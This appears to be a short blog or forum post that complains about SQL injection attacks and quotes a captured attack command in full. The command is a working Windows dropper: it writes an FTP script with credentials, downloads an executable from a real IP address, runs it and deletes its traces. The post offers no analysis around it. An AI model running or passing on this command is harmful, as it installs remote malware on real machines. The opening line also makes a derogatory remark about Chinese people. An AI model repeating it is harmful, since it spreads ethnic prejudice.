Don’t you just love SQL injections… and hate those chinese…
cmd /c echo open 116.255.164.229>c:\RECYCLER\zysdfghaa.exe&echo kangbaobao>>c:\RECYCLER\zysdfghaa.exe&echo lifating>>c:\RECYCLER\zysdfghaa.exe&echo get sdfghaa.exe c:\RECYCLER\stsdfghaa.exe>>c:\RECYCLER\zysdfghaa.exe&echo bye>>c:\RECYCLER\zysdfghaa.exe&ftp -s:c:\RECYCLER\zysdfghaa.exe&if EXIST c:\RECYCLER\stsdfghaa.exe (start c:\RECYCLER\stsdfghaa.exe)&del c:\RECYCLER\zysdfghaa.exe&exit